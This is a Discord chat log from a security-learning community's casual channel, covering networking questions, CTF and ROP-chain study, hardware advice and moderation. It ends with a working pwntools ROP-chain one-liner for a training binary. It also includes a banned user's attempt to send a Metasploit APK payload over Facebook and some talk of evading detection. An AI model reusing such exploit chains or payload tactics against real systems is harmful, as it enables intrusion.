#quiet-conversation

DDoS is unethical

Unethical discussions are against the rules here

oooo

i see..my bad😅

im sorry

👀

What's the networking based reason for an ack instead of an immediate HTTP response?

Does it have to do with OSI layers (transport and application specifically)?

or is for situations when a server might be processing a request for a long time and wants to make sure that the client knows that it did receive the request

so for differentiating between server unreachable vs request timeout

‘Caus the protocol says that tcp segments transfering data must be acknowledged to insure reliability (Not sure to have understood the question well)

It's how TCP works?

the HTTP packet is generally built on top of the TCP packet

TCP assures the transport of the HTTP

the ACK is there to tell the requestor that the packet has been received, don't bother resending it

Ahh like that

but yes, it's an OSI thing 🙂

tcp/ip thing* 😉

well, yeah

but you're transporting HTTP on TCP over IP

?membercount

It's not accurate. but it's not far off.

yep only by a measly 76, 986

Go and complain to Muiri if you're not happy with the accuracy. 🙂

@warm peak Wanna make this too? xD

there is a reason to why it is behind, discord does not like when something updates all the time and limits how much you can do, therefore to not make the bot slow with the commands it will update slower and be behind with the member count and then be able to do commands a lot

Ah gotcha

after completing the web fundamentals/cyber defense paths will i be well equipped enough to make my own entry-level vulnerability web scanner for defensive purposes?

To make such a tool you will need to have some sort of programming/scripting language experience. Those paths that you listed aren't quite designed for that.

hmm yes thats why im asking im doing django/ruby on rails and i would like to make some stuff for it relating to cybersecurity but i dont know enough about cybersecurity to even know where to start

hence why im here xd

Totally accurate. I can take it once more but I'm going to do it after I go through C Dev Fundamentals

See how much I grow

Hi

Which site is that?

had to try it out. did not expect that 😅

👀

ayy

Shows that I haven't implemented prod code yet lmao

never made any custom modules or unittests :d

LMAO WHAT

this site is so broken I've literally made two programs in C (I did some RE though)

🔥

Well I think the site is fine since this survey is tied to C Dev Fundamentals.

?membercount

Is this a selfbot?

no

We don't have a bot here that uses that prefix, are you using a custom client or something?

yeah

it could also be a weird way to ask the question of how many members there are.... that might be common in places where they place a symbol at the start of questions and end

like spanish for example

never mind.......

Do you know that's against the Discord terms of service and they can close your account for that?

ohk

sorry

Also isn't the member count at the top of the channel list anyway

Yep...

@burnt night sorry

IDK why you're saying sorry to me, it's discord that will close your account

i understood

it is also possible to view how many users are in here from the discord invite for this discord.... and that is also updated quicker because it is internal discord stuffs

can I be mod? @terse gorge

not funny

Smells like troll in here

am serious

nopes

wow look guys he has a shady profile picture... he must be a very cool real non-pubescent hacker

I wish I could be so cool

hmm looks like someone violated rule 1 and rule 3 in my dms

Lol

Would you care to forward that one on to a mod?

But also, you can call out an edgy pfp in a much more polite way

I genuinely admire some mods for the amount of patience and understanding they have.

Be specific. Helps me figure out who to target to annoy them.

bonks @meager mason

Ahuh! The first victim has revealed himself.

I shall give you the prodding of a lifetime!

not if I prod you first!

i hope my anxiety and scrambled mind doesnt cost me the job interview for a pentesting role tomorrow, i'm moving from a SOC role and i hope i have enough knowledge to make this through

All the best to you

hey guys
Does anyone have the same problem
The burp suite module is not available in the Complete Beginner path
Instead of https://tryhackme.com/room/rpburpsuite it redirects to
https://tryhackme.com/room/burpsuitebasics

what to do😫

That is entirely intentional.

The complete beginner path is deprecated

It's sad because I almost passed it

Good thing I haven't started burp

oh, the beginner path is deprecated ? i finished it a couple of weeks ago, doesnt matter that much, the goal is to do all of thm 😄

Are amd 5000 processes good for virtualbox

Depends on the model but in general they should be fine

Is NFS the unix equivalent of SMB?

Yeah sorta, but they both have their benefits and use cases too (: @frail rapids

This is super random, but is anyone here good with growing plants? Specifically from seeds and peppers.

you will need to practice exploiting common web vulnerabilities to learn what a successful exploitation looks like. Then you can write a scanner which tests a web app and checks the responses.

im about to finish the jr pentester path, wondering what to start next, offensive or defensive path, what is more fun ?

Imo defensive is more theory while offensive is more hands on

Hence, imo offensive is more fun

Everyone saying off is more fun, I doupt def isn't fun as well

What's the best way to get better when you have all the basics? I feel like I'm mediocre at everything (binexp, RE, enum, webexp, et cetera) but don't know how to improve

Some blog posts are too complicated whilst others are too basic

dive in the too complicated posts and google everything u don't know.

@final gulch CONGRATS ON SANS COURSE!!!!!!!!

oh, hi. It{s just a reminder to myself what I should be working on

Any mods around that can give me the Security+ role? 👀 (Edit: Fluff got it, thx Fluff!)

Sorry, I saw that you pinged me but I was out

No worries!

@burnt night ayy yo,how come your name is james while you are only one dude 😩 ?

Because that's not how English works?

You need the ' for there to be multiple

canned beans would like a word

So James' would mean there are multiple James

Or you use that to refer to something that is theirs

james's icecream???

James' can also refer to the possessive form of the name as well. Something belonging to James. Such as James' name.

https://tenor.com/view/vrrt-clone-james-adventure-time-gif-10974348

Yee I said that but not as eloquently

The something that is theirs

This is a party of Jameses in the apartment belonging to James. It's the James' Jameses jam.

How will you know what the target is in challenges like binexp? eg sometimes its dropping a shell sometimes its just hopping to a diff function

If it's hopping to a different function, you'll see the function you're going for

Hm aight

I do like the one Jame theory

Or if it's in pajamas and they shorten the name, it's Jimmy's Jimmy Jim Jam Jamboree

I'm trying to find a .git file infrastructure online but i can't find anything. Am I using the wrong term?

Like the file repository I mean.

I should have just made a local one at this point.

@primal steppe do you recommend Anova sous vide machines? If so do you have a specific model you recommend?

Yeah the one cheaper that the pro

Does awesome

Precision?

How many watts?

1000

I think that's the sous vide machine I have, as well

I have the now Beeville Joule

It's great

Is there a website that collects blogs etc from the web?

Google does it well.

so you can e.g. filter by kernexp and it'll show kernel exploitation blogs, but like, properly unlike google so e.g. thumbnail, description etc

welp couldve seen that one coming

You might be able to set up something like an RSS feed. But good luck.

Proper search engines are a real pain to set up

Yep, it's why Google is so dominant

They're vertically integrated so it's easier but still difficult

Hey Moose

Hi

How’s it going?

Tired

Yeah…. I can relate.

Unfortunately i need money, warehouse or tryhackme??

The reason I personally don't like google for blogs is that the basic/keyword spamming blogs end up on top so there's no way to check for quality without visiting the blog

https://wiby.org/

https://search.marginalia.nu/

maybe https://www.mojeek.com/about/

symbolhound.com if you want to find programmer blogs about specific non-dictionary-word stuff

also /r/hnblogs

heyo

I'm very quite, I like this.

I wonder if this matches the purple

how's everyone doing c:

Heyo 🫡

suggest some rooms

Ah rolling release, how I love you so. "what do you mean I need to upgrade my postgresql database to keep using Metasploit?". And that's how the package got locked in my config to 14.2 after that dramatic upgrade procedure

Honestly wouldn't have it any other way. Now I know how to upgrade a postgresql database and know to lock my package version so I never have to do it again :p

If I was on a shared network with someone up to no good, what else could they realistically do other than intercept my data through MITM.

Does anyone have tips for web "exploitation" in CTFs? enum specifically

its always some stupid parameter or file I fail to find because I use wrong wordlists, forget things, etc

Depends on the event honestly. In my opinion, a good CTF web challenge, unless the challenge is about enumeration, should make all of the endpoints relatively easy to find. The challenge should be figuring out how to put all of the puzzle pieces together, not finding the puzzle pieces in the first place. (assuming we're talking standalone CTF events and not boot2root)

If you're referring to stuff like HTB/THM machines, then I don't really have any good advice because I still need to get good at that

That kinda goes contradictory to the idea of a good CTF challenge being realistic

They shouldn't be made easy to find -- but neither should they be made ridiculously hard to find. They should be built in a realistic manner, making them as easy or as difficult to find as the context demands

That's what I meant, I just worded it in the opposite way 😅

I also don't necessarily think that a good CTF challenge has to be realistic. I think some of the best ones do end up being the most realistic, but there are also a lot that are just as rewarding learning-wise despite not being "realistic". (but that's another conversation to be had tbh)

I would just hate to have only barely missed the challenge solution because "x" word was in my wordlist but "y" was the directory I was looking for. And again, talking about standalone events here where fuzzing usually isn't a part of the challenges.

hello

using the wrong wordlist (not from any of the “usual” ctf wordlists) is just a cruel thing from the creator (if finding via dirbusting is the intended method).

forget things? that’s on you. create/modify a checklist of everything. something not on your checklist? add that check in for next time (ie. try every http verb on an endpoint)

stupid parameters? also should be included in checklist. fuzz params for file names, common words, special characters/strings

using the wrong wordlist (not from any of the “usual” ctf wordlists) is just a cruel thing from the creator (if finding via dirbusting is the intended method).
Assuming there isn't a giveaway elsewhere.
If you're using some obscure (but documented) CMS with unusual endpoints then that's fine -- it won't show up in your wordlists, but you can use the docs to generate one specifically for the box 🤷‍♂️

hello can you help me?

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

what is the IP address of virtual machine?

Did you start the machine?

yes

yes

The ip should be up the top

thank you I saw the IP address but when I do some scan answers do not match or maybe I fill in the wrong answer so I need help on some questions

thank you I saw the IP address but when I do some scan answers do not match or maybe I fill in the wrong answer so I need help on some questions

Gave +1 Rep to @south inlet

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

#room-hints too please

@fervent glade Could you share your link with me when the king of the hill starts. I'd like to spectate you

quiet kid

@smoky mortar I think I found a problem with a new room, may I PM you? (It's something I think should not be posted publicly)

Go ahead. 🙂

Your boy just donated blood. I'm 500ml lighter now

I had this really sweet, babushka of a nurse taking care of me.
So she obviously had to chat me up, asking me what I'm studying and what I do. I obviously replied that I study cybersecurity.
And she stopped for a second, looked and me and said "I have no idea what that is. But go on!" hahaha

So I tried to briefly explain to her what cyber attacks are, using the ongoing war in Ukraine as an example. And I told her that people like me are basically like hackers, but the good guys!

And it was so sweet. It made my day

I wonder if there's a decent analogy to be made using the immune system

Maybe compare it to vaccines?
We're coming in as a (simulated) threat, so the body can learn how to protect itself in case of a real attack by a pathogen.

This analogy is far from perfect, but It's the first thing that came to my mind

Oh for pen testing? Yeah, or maybe an allergy panel is vuln detection and vaccination is security patching lol

I was picturing a blue team as the immune system and a red team as pathogens I guess
except probably with slightly more creative adaptations to each other

That's a fairly good comparison too!
The analogy I often use whenever someone has absolutely no idea what penetration testing is, I simply compare pentesters to bank robbers.
I tell them to imagine a world where banks would hire teams of bank robbers to perform a mock robbery and tell the bank what their weaknesses were. After this "robbery" the robbers would write a nice report on how they performed the robbery, what weaknesses of the security systems they used, and would tell them something like "Hey, you need an extra guard here", "Don't leave that door open and make sure only authorised personnel can go through", "While you're at it, buy new reinforced doors with better locks".
All this effort to make sure the bank is safer in case of a real robbery.

This is actually a real thing that banks do. As a hypothetical, it definitely has real world people doing this exact form of testing.

Oh yeah? That's interesting because I haven't heard about it, but somehow I'm not even surprised. Are those people mostly former bank robbers, or just specialists who study the methods used by robbers?
Because in my analogy I wanted to put the emphasis on the ethical side of it. That technically, by studying to become a pentester, it's pretty much like studying to become a robber, the main difference being that you decide to do it ethically.

Neither. One of my coworkers used to do this. A lot of is exploring the limits of procedure and organizational controls with a very very narrow scope and nearly unlimited risk within that scope.

Wow, that's cool.
So it's kind of like being a social engineering vuln researcher. Right?

Not.... really. Every engagement is different, and each engagement is likely to put different sets of controls in scope. It's like any pentest contract.

Okay, I see. When you said limits if procedure, I thought you're strictly talking about abusing the procedures in a social engineering way

But I get it now

Do y'all use wfuzz for non-directory web fuzzing?

i use burp, but on the command line i’d use ffuf

this is perhaps a dumb question, but how do applications use different languages and frameworks, e.g. a webscraper using python, how would I then display it using java

You'd need some way of interpreting the output

Something like JSON or XML is commonly used to interface different things over the network, but there's lots more

hey

Hello

Why use man page if Google is faster??

cause sometimes you won't have access to google @radiant jacinth

I disagree, that should NEVER happen lol (but yes I do know how to use man pages)

you can disagree but it's true

ever had no wifi before?

Oh... gg

Restricted environment, or client network where you don't wanna be searching up random stuff 🤷‍♂️

Then again, I have literally installed tools on my box connected to a client network before to see if their SOC noticed, sooooo

What was the ratio to found out/not found out?

TL;DR: I literally told the client to fire the subcontracted SOC, but for obvious reasons I ain't going into any detail :)

Is it silly that I’ve never really made the connection between video game and console exploits and more general infosec until recently? Of course I’ve seen fail0verflow CCC videos and “oh do these things to execute arbitrary code” in Ocarina of Time speedruns. As someone who’s huge into emulation and console homebrew, I always categorized it as helpful tools in my brain until looking at it more critically from infosec standpoint and getting into reverse engineering. They’re not often malicious after all from the consumer’s prospective so didn’t register with me in quite the same way despite my fascination with both

I only recently learned about the Stop n Swap Paper Mario speedrun where you use a buffer overflow (iirc, might have been a different type of exploit) to get code execution and trigger the ending cutscene

https://www.youtube.com/watch?v=O9dTmzRAL_4

Yep it may have been literally that exploit that caused me to rethink things a bit, I’ve seen some impressive arbitrary code execution in SMW and many others but getting one game to do so to another is stunning

It is beautiful how game hackers do their thing

I’m watching the TechRules video on game/console exploits from about 6 months ago, just took hearing arbitrary code execution again after learning infosec put things in a new light, but yeah idk why I’m surprised. I interact with emu devs and game reverse engineers often, just didn’t click with me “oh this is literally the same skillset” lol

Even followed Paper Mario glitch videos lol, guess I missed it when it was new. Thanks YouTube

Hearing all of those things and then also finding this link recently has made me want to do a little bit of a dive into this stuff: https://gamehacking.academy

Very interesting, thanks! Honestly once I learn reversing and debugging a bit better, I’d love to circle around to ROM hacking. Already have a good bit of experience with pre-made tools, but would be interesting to dive deeper or getting into memory analysis with cheats. Just kind of opening new doors for me now that my infosec interest are getting into reverse engineering when that’s like most of my fave projects lol

Reverse engineering is the absolutely best/worst thing ❤️

Yeah I’ve read many writeups and looks like painstaking work. Especially getting into the lowest level ASM side, that may be a bit much for me generally but we’ll see lol. I always found it fascinating but didn’t have the fundamentals to get started until THM and infosec

I’m eagerly awaiting the reverse engineered port of LucasArt’s Jedi Engine (Star Wars: Dark Forces, Outlaws), and have been using OpenJKDF2 for my most recent Star Wars: Dark Forces II play-through. Those are a bit more niche but yeah projects like OpenRCT2 for Rollercoaster Tycoon 2 are things I’m all about. While yeah we’re generally analyzing malware in infosec, once I started getting into IDA, Ghidra, and such that I was like “Ohhh” lol

Hey so im doing sudo apt install john but it keep giving me john 1.8.0 and the latest one is 1.9.0. And i have upgraded the packages

Ubuntu is not what we'd call rolling release. Once the final versions are decided and tested for a Ubuntu or Debian release, then those packages are basically set in stone with no new features. Only security updates. It's likely you're on a Ubuntu/Debian based distro which is following this principle. PPAs (custom Ubuntu repositories) can help resolve this, but they're not official for Debian based

Or you know you can just compile john locally https://github.com/openwall/john you can find installation steps easily.

Don't create a FrankenDebian by using externnal PPA's with Debian stable https://wiki.debian.org/DontBreakDebian#Don.27t_make_a_FrankenDebian

Yeah im just gonna do that

Are there tools that do stealth fuzzing? as in, mix invalid and valid requests to make it look more legit

I'm especially talking about dirbusting (not that I'd need a tool for that, but I can imagine red teaming pentesters would need it to avoid detection)

I don't think mixing requests even on a v big time span will make u avoid being detected

Isn't it atleast less obvious when you're filtering malicious users out of normal users?

hmm yeah, wouldn't need proxychains though

Just iterate through a proxy list file in the program

Assuming you're watching for that

Not sure how common that would be

I think it's question of how common relative directory traversal is in the system as a whole

I see you aquired ceh, any specific reason for that?

I don't have CEH -- Varg is being a dick

Probs wanted to work at gov

Naw, if I see a job requiring me to have that cert I'm walking away 😆

to india?

Del varg

From India -- that's the only place they seem to really like it these days, for some very stupid reason

Don't know if I'm allowed to ask this, but does anyone know how youtubers like Jim Browning manage to track those scammers down? I imagine he only has an IP address of the scam office (based on the teamviewer connection or whatever)

and manages to identify scammers and get camera footage, which I doubt is even possible (aside from ip cam default creds which need to be portforwarded)

Idk who you're talking about but it's probably staged

A lot of if is the cyber version of what a private investigator does. Many of those activities are in a grey area at best, and I wouldn't recommend trying it out for yourself without getting a reputable lawyer specializing in cyber law to look over your scope and activities.

Jim Browning is legit. He's dedicated to exposing scammers to legal consequences where possible. When there are legally actionable items in play, he delays videos and censors them so as to not pollute or contaminate the case.

He's also worked with UK and Indian law enforcement and helped the BBC make an expose as well.

yeah I definitely like jim browning

Ah alright

Welp I'm definitely not going to do grey hat things

Was just curious about the techniques

I see

I keep on getting those scam things recommended and they all looked staged or were conducted in an extremely grey way, so I assumed

Many of them are staged, or re-enactments. If you see grey or black behavior, it is usually staged. Not all though, and the latest Mark Rober scam payback video has me questioning some things

Yeah i saw that too in the recommendations. I didn't click because it seemed staged. Dude is too nice/straightedge to do anything real

Well he did do a collab with jim browning 🤷‍♂️

but yeah, tbh I was thought it was staged as well

Hi guys, hope you all have a great day🙌

May i send you i short dm @burnt night ?

May I ask what it's regarding first please?

Its about the conversation last day we have, i think about both side s and i feel to share with you

Unless it's an apology, I'd rather you didn't DM me.

I think its more than an apology and you are gonna love it

Ok, go ahead.
I appreciate you getting permission first.

I will edit it end send. Yea, i am a experimental learner 😄

It's been a while. I've been busy at grad school, but we have summer break now, so hopefully I can do some THM stuff a little bit. Here's is some steak and grits I cooked some time ago. I meant to share it here.

Can't go wrong with this at all. Looks rather yummy (:

Anyone know any good recommendations for laptops? I know what to look for in desktops but still have yet to see any solid info on laptops. Since this site has multiple experienced people dedicated to pentesting I figured this would be a near full proof place to ask, for recommendations or at least tips on what to look for

I don’t imagine desktop to laptop will be a huge difference in what I should be looking for but just in case I want to ask before making a hefty purchase

I especially wanted to ask since laptops aren’t very customizable

And I’ll look into xps. Any specific kind or just any from them?

I don’t necessarily want customizable, what I meant is contrary to a laptop, if my desktop is lacking somewhere or I want better I can simply improve said aspect, versus not so much for laptops

I guess that would mean I want customization 🤨🤔🤔 huh

If you don't need a GPU and it's for personal use, I'd grab a refurb business laptop

If you do need a GPU, XPS are usually available refurb

100% personal just to practice pentesting as recently and in the near future I am not at home as much, although I will be getting an apprenticeship here soon

So maybe not 100% personal use in the future I guess? Sorry

Refurb is so much cheaper, and better for the planet which is a nice bonus.
If you get the right models, like my Latitude 5400, you can get a decently repairable laptop for not so much money.
I got an i7 at 4.8GHz and 16GB of RAM for £370

WOW xps has a price tag jesus

Yeah, XPS does

Dell has a factory outlet/refurb store too though

Literally $500 cheaper thank you. I’ll look into the three recommendations you two gave me thanks for the help 🙂

It’s more like $250 average savings but still

I'd recommend looking at stuff like ifixit guides for how repairable/upgradable it is. If you go for one where you can change out the ram (2 slots) and the SSD (1 or 2 m.2 slots, maybe SATA on bigger laptops) then IMO you'll be quite happy

I got mine off ebay

eBay huh😬😬

Also highly recommend reading reviews looking for things like build quality.

If you get good sellers, then ebay is fine.
Lots of businesses sell on Ebay and I have a nice set of UK sellers that I look for stuff from when I need tech.

And for laptop use it’s okay to just wipe windows and install Linux correct?

I’m fairly certain I can just not sure if that’s the best option

Yeah.
I'd recommend VMs though. Just bear in mind that Linux compatibility on laptops is a whole minefield. Arch wiki is pretty good for it IIRC, even if you're not looking to run arch.

Oh it is huh. Interesting 😒 thanks

they're a bit pricy though

Man they sure were 😩 ugh

Why do you want to hack instagram?

-undelete -a

Twas me, dw

ah, yeah, i see now. My app hadn't caught up

I thought they were trying to hide shenanigans.

run

@burnt night Man i send you a friend request to send my DM

You don't need to, you can adjust your privacy settings to allow DMs to people who aren't your friend.

Because it said you cant dm without it

I try to keep my friends list as a friends list

didn't know that 👍

how i send to any one my android app its file name is apk but its lock and when i send it fackbook says that is virus file

why do you want to send an apk to another person? You can just tell them where you got it from if it's publically available and from a trusted site.

Though if Facebook says it's malicious then I'd rethink to send it to anyone. Especially if it's custom written with bad intensions in mind.

@brave barn Are you trying to send a reverse shell over Facebook?

no

You generated a payload with metasploit right? An APK?

yes

And you're sending trying to send it over Facebook?

yes

Are you trying to attack people by sending them this apk?

you have your facebook i sen you picture . yes yes you right

-ban @brave barn Trying to send malicious APKs over Facebook to attack people. Blackhat.

🔨 Banned abdulghani#5893 indefinitely

Can't believe the interaction above is real

gottem

That is impressively stupid smh

I just assume people like that are always trolling, and I know I'm wrong.
But those who don't - I always wonder why do they always act so... Weird? Every single time.

I mean, at least they were honest

That's. Quite the conversation

That's quite a quiet conversation

Sorry to be a bother I just want to make sure as it’s a hefty purchase. Is 4 cores for a laptop a good amount for pentesting?

I normally just make a VM on my desktop and toss 8 of my cores at it, never paid it any attention past that really

I feel like 4 is plenty and I’m overthinking this🤔

If I’m running a VM on it then I would have to run maybe 2 cores in the VM I would imagine, unless I feel comfortable making kali my host OS

I just remember when I first built my desktop on a whim I messed a ton of things up and don’t want to do that again with my laptop

If I'm running a linux guest with a desktop, I usually give it 2 cores and 3-4GB of RAM. If it's headless, I usually run 1 core and 2GB or less of RAM.

O

Huh. Thanks for the info🤔

You also have to remember that the host still needs resources too

Yeah my two core, 4GB RAM terminal only dedicated pentesting virtual private server is honestly kinda overkill for my needs like 95% of the time

I should have known that doing minimal Linux for years, but wasn't sure about pentesting headroom

If using burpsuite pro with scanner I recommend atleast 16GB

I'm on the fence about wether I want to upgrade my desktop to 32GB

I did it, I haven't looked back since fixing the ram clock issues

We run 32 at work too, it's nice

64 better

Hm aight

I've been considering an upgrade but I have a 2017 motherboard so if I want a reasonable high ram size and speed I need to upgrade my entire system (old cpu socket etc)

Not sure what platform you're on but I wouldn't be buying DDR3 now brand new, grab second hand if you're on DDR3

What do you mean?

I have a bunch of .MD files and i was wondering if I could transfer them somewhere else with obsidian itself

Where did your message go?

It's probably easier just to use file explorer

obsidian has a sync option

not sure if you can point it to anything other than cloud though

Yeah, the original message said offline

you could put the file structure on onedrive or a another cloud service sync

I realized it was stupid after I asked it lol

I just have to fix my pooter so it can access wifi again

q u i e t

0day fb account is my favourite fb moms quotes account 🤣

Shhhhhh quiet

~~ @dreamy kayak ~~

anyone expert in linux here ?/'

Lots of people

If you have a question that you're looking for answers to, make sure you've researched it first. Then just ask the question directly. No one knows if they can help until they know the question

hmm it is the real place i can collaborate with genuine peoples 🙂

Just ask your question.

Lol thanks, I’ll take that as a compliment @dusty sleet

anyone here track what countries they’ve been to in a cool way?

i just currently have a world map and pin them, but i wanna do all of europe and this place is so tiny so i’d wanna just get a europe map but there’s gotta be cooler ways than just pinning it

I've been thinking about how to do this myself as I think I've crested double digit countries. I've seen scratch offs, LED matrices, the pins, and aviation sectionals. One thing that I saw yesterday was a map with each countries traditional style of coffee. This was at a coffee shop but could definitely be modified to fit the visited countries. Also, get to try a bunch of coffee lol

One thing I have started doing for the US national parks is going to the visitor center and getting a magnet, a patch, and a coffee cup. Magnet i stick on the fridge, patch i put on the roof the car, and the coffee cup i either shelve or drink out of depending on the material.

Costs about $30 a park

I have a scratch-off map

oo scratch off maps look pretty cool, might go for one of them

i’ve also got different souvenirs from each country i’ve been too which sucks, i think i want to get the same thing from each country - like you do moose

not sure what i wanna do though

also gonna do everything again, regardless if i’ve already been there when i do get the scratch off

Maybe a thumbnail print of each place under a pin?

that’s a good idea too, seeing as i’ll be doing them all again i could get decent photos

this seems like a decent breakup of countries i can do in different trips

Could get nerdy and do a SIM or something lol

what’s that?

Sim card

Like a SIM card

ohhh lol

@quaint basin, I saw you created the "upload vulnerabilities" room. I find it interesting that it asks the user to set an entry in the hosts file with multiple subdomains pointing at the same IP. I guess that was a way to offer multiple challenges without having to create multiple VMs, right? May I ask how it was done? (Something with Nginx perhaps?)

Thanks lassi!

Gave +1 Rep to @twilit nacelle

"Something with Nginx" would be correct
Each challenge is dockerised and behind an Nginx reverse proxy (hence the vhosts).

The implementation there is a lot sloppier than I would use now, but it works 🤷‍♂️

even more reason to learn about containers!

cool thanks for sharing that info!

Yeah, containers are absolutely awesome. Love them

They are!

Containers of anything chocolate are my favourite

this is my legacy

I'm proud

toolbx is the most useful container

@warm peak may I DM?

sure

Eh, you call it legacy, I call it fault

swings and roundabouts Mr. Muiri 😎

Is there a way to work around encrypted PDF file without using Acrobat Reader? (password protected)

By changing Windows Permissions, etc

When I right click on the .PDF file to read it with Notepad++ it's for the most part coded and unreadable.
But there is definitely some code logic in there.

did you already try cracking it? (IE: pdf2john?)

Hey there! Is anyone in here able to read Persian text?

Do you understand what encrypted means? It doesn't mean protected by windows permissions.

Not much, but if it's in an image, you can try OCR:

https://www.i2ocr.com/free-online-persian-ocr

and then copy the text from that and dump it into google translate.

Thanks mate! I did try that though and it wasn't successful. Can you read numbers? The image I believe has numbers

Gave +1 Rep to @merry bramble

I can try, I know the arabic numbers and they're very similar

Although I have to head out in a minute

In fact, I have to go now. But here's an overview of both Arabic and Farsi/Persian numbers:

https://pit.farsi.rocks/persianword/numbers.htm

Good luck 🙂

Awesome thank you!

Gave +1 Rep to @merry bramble

Yoo! I got a problem with my VBox (Latest update) booting into grub/uefi on my parrot os installation, the problem started when my VM crashed (I overloaded it), anyone know a way to fix it? Google wasn't very helpful and it seems to be a common problem.

I'm officially stupid

I can transfer files with a usb without the need for any kind of wifi

Why didn't I listen when people told me the have snapshots of my VM

@gray jetty I blame you.

https://tenor.com/view/why-whatever-gif-23592041

Why not? Things are usually your fault xD

you do deserve it tho

srsly though, do you know how to solve it?

I always snapshot my VM's

And for good measure, I clone it, then move it to an external.

Well I’m dumb and didn’t

It’s crazy corrupt rn haha

Yo guys

What is up

Nope, I'm a dual-boot guy, @south inlet could help but he's dumb

Many people don't know this but holding control while using the arrow keys will allow u to move 1 word each time,likewise to delete a full word hold the alt key while using the arrow key (in terminal)

Wait thats really cool haha

+rep

Gave +1 Rep to @dusty sleet

Hi everyone

Definitely useful, I find myself using Ctrl+a (beginning of line) and Ctrl+e (end of line) a lot more personally.

Also you can use ctrl+u to delete everything from the beginning to the cursor, and ctrl+k - delete from the cursor to the end

I thought control - k was hyperlink?

ctrl + k removes all text from cursor to eol in linux

ctrl + k in a browser is used to focus on search bars

https://github.com/fliptheweb/bash-shortcuts-cheat-sheet

pay special attention to the history expansion section

I didn't see that this was for terminal whoops

#quiet-conversation message 🙂

Yeah

-ban 327156963785965568 -ddays 1 nsfw discord invite

🔨 Banned 327156963785965568 indefinitely

James got it but didn't ddays

hi

for my arab audience
this song slaps

https://youtu.be/j1pk0g31XQ4?list=RDj1pk0g31XQ4

WHAT?

hello

I think Ive pinged u by mistake sorry

question : how does one use metasploit in an actual engagment , I am talking especially about saving the information one gathers in suitable databases ,setting up dedicated listening servers , c2 etc, is it suitable for a red team or is there a better tool for the job

I mean red teams do use it, not too different than how you might use it, there are also other tools tool that may be used

There's lots of C2 options

I've read metasploit unleashed in the past, I don't think I've read any extensive part on this context, can somone recommend me a good red team book that discussess this topic

This channel isn't for room related stuff

Go to #room-help

Sheeesh rop chains are hard man

I'm currently doing ropemporium challenges and am already slamming my head into my desk at challenge 4/8

Does anyone have general tips with regards to rop chains? I'm personally struggling with finding the right instructions even though I'm using ropgadget for retrieving gadgets

For most of the ROPEmporium stuff, the first place to look is in their usefulgadgets and usefulfunctions areas

are you using pwndbg? or ropper?

(or ropper within pwndbg?)

Nope, just rabin2 + ropgadget + raw gdb + ghidra

I'd definitely use pwndbg or gef, I prefer pwndbg

ropgadget is good too, but I usually get more parsable results from ropper (except within pwntools, where it's kind of meh)

are you doing the 32 or 64 bit? I only did the 64 bit versions of all but the first one

I'm currently doing 32 bit to practice rop concepts

am probably going to switch to x64 if I finish all challenges in x86

I get the philosophy there, but there's a pretty big leap there because of the way that arguments are passed in most functions now with the 64 bit architecture. You move from having to fill a lot of registers instead of loading the stack with the variables. So the rop chains you use in 32 bit aren't going to be very usable in the real world

but I mean whatever helps you learn has value, I'm not dissing on it

there's also 32 bit embedded systems out there (although less of them are using x86 these days)

As far as tips go, I guess the best I could offer is to write out what your final function call is going to look like, and work back from there. Which registers have to hold which parameter, etc. And then find ways to get the data there working backwards.

Hmmm those are some pretty good tips. Thanks

No problem 🙂 Happy hunting!

Why ? Reason ?

Was that you? @novel blade

Not it was not me @tawdry dove I am new here and was wondering what did the user do for an "indefinite ban".

Violated server rules

Just read the #rules and you'll be fine 🙂

Is it ok to discuss THM technical stuff from the exercises/quiz/CTF ?

In appropriate channels, yeah

ok thanks...will check the #rules

Not that it matters hugely, but the reason is given just above.
Dropping an invite link to an NSFW Discord server

What can be NSFW ? People can DM I suppose and invite/network ? or is that also banned ?

Follow the server rules; they are pretty clear.

Yeah that's a bit ridiculous

Ain't no time for that

What, the rules, or dumping NSFW links? 😆

Lewd dumping 😎

Like bro... Lol

Anyone have any discord channels I can join that teach about starting 3d modeling?

Might wanna check out blender discord server

Blender, Maya, Autodesk, etc. Plenty of resources on YouTube

Oh wow another person who watches mentaloutlaw

We try to keep away from all that tinfoil hat nonsense here, please.

No, I will never buy into the conspiracy theory shit.

I'm so terrified of buffer overflows, anyone got pointers for me before i start trying to learn them?

If you understand computer architecture/organisation, how functions work, how a stack data structure works, and learn a touch of C, it becomes much easier

BOF isn't something to be scared of, but it builds on some fundamental topics from the CompSci field

thank you 🙏

Yep. in addition to that, learning assembly is helpful as well

Makes you really understand how buffer overflow vulns work and it's a good prep for rop chains etc

Learning assembly follows on nicely from architecture/organisation

Would a room like "windows internals" be a good first step for computer architecture/organisation?

No, that's operating system stuff. You need to be looking way below that level, basically at the hardware level

Would there be a room for it on THM? If not, any good search terms / specific resources yk of?

I don't think there's any content on THM for it.
I learnt via traditional schooling so I don't know of any courses. Juun recommended a book that goes into likely way more detail compare to what you need, but I probably can't find that.

@pine iron this is the book

Does it go into deep maths or anything?

I haven't read it nor do I own it. But it's juuns recommendation for computer architecture

So I'd assume it has some level of math

Depends on what you mean by math. And it's how computers work, you can't really get away with running from math if you want to actually learn something of value in that field.

Hello people of hats 👋

I have a question, in your professional opinion, are you biased to saying that windows is more secure than linux or the other way around according to the following scenarios:

1$ Targeted attack: an attacker A is specifically targeting machine B

2$A fully developed ubuntu virus that uses 0day exploits and priv esc capabilities

3$ A fully developed windows virus that has 0day exploits ,priv esc capabilities, and AV evasion

4$A linux freeipa server controlling linux computers

5$A windows AD system

6$A threat actor specifically designing a ransomeware with the target being affecting the highest number of users

7$IOT system using windows core
8$IOT system using ubuntuiot
9$IOT system using stripped custom linux distro like yocto proj

Ty in advance
💙

Is this a homework assignment?

It looks like a homework assignment

I assure you it is not james,Ive written this question after seeing so much debate on the topic from so many resources

Is there anyway to possibly generalize that? Both windows and Linux have a million ways to escalate privileges if things aren’t setup correctly. Only thing you might be able to generalize is that AD widens the potential impact since it’s how a log of organizations manage every IT resource

And 0 days will break any system because by definition no one knows about it and can develop preventative/mitigating measures

print((p:=__import__('pwn'),b'A'*44+b''.join([p.p32(0x080485aa)+p.p32(0x0804a020+n)+p.p32(ord(c))+p.p32(0x08048543)for n,c in enumerate('flag.txt\x00')])+b'\xd0\x83\x04\x08BBBB\x20\xa0\x04\x08')[1])
``` who said payload printing shouldn't be a oneliner

